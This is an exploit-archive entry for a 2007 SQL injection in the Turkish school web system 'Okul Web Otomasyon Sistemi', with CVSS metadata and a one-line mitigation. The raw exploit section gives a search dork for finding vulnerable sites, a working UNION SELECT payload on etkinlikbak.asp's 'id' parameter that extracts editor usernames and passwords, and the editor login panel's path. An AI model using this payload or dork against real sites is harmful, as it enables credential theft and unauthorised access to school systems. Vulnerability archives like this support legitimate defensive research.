Script: Okul Web Otomasyon Sistemi

vendor:

Okul Web Otomasyon Sistemi

by:

milw0rm.com

5.5

CVSS

MEDIUM

SQL Injection

CWE

Product Name: Okul Web Otomasyon Sistemi

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Script: Okul Web Otomasyon Sistemi

The etkinlikbak.asp script is vulnerable to SQL Injection. An attacker can exploit this vulnerability by injecting SQL code in the 'id' parameter of the URL to retrieve sensitive information from the database.

Mitigation:

To mitigate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL injection attacks.

Source

Exploit-DB raw data:

-------------------------------------------------------------------------------------------------------------------
AYYILDIZ.ORG PreSents...

 
Script: Okul Web Otomasyon Sistemi
Script Download: http://www.aspindir.com/Goster/3822
Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>
 
DORK: inurl:etkinlikbak.asp
-------------------------------------------------------------------------------------------------------------------
Exploit:  etkinlikbak.asp?id=-1%20union%20select%200,editor,sifre,3,4,5%20from%20editor
-------------------------------------------------------------------------------------------------------------------
Editor Panel: editor_gir.asp
-------------------------------------------------------------------------------------------------------------------
 
Tnx:H0tturk,Dr.Max Virus,,PcDelisi,CodeR,Dumenci
Special Tnx:Asianeagle, AYYILDIZ.ORG

# milw0rm.com [2007-01-15]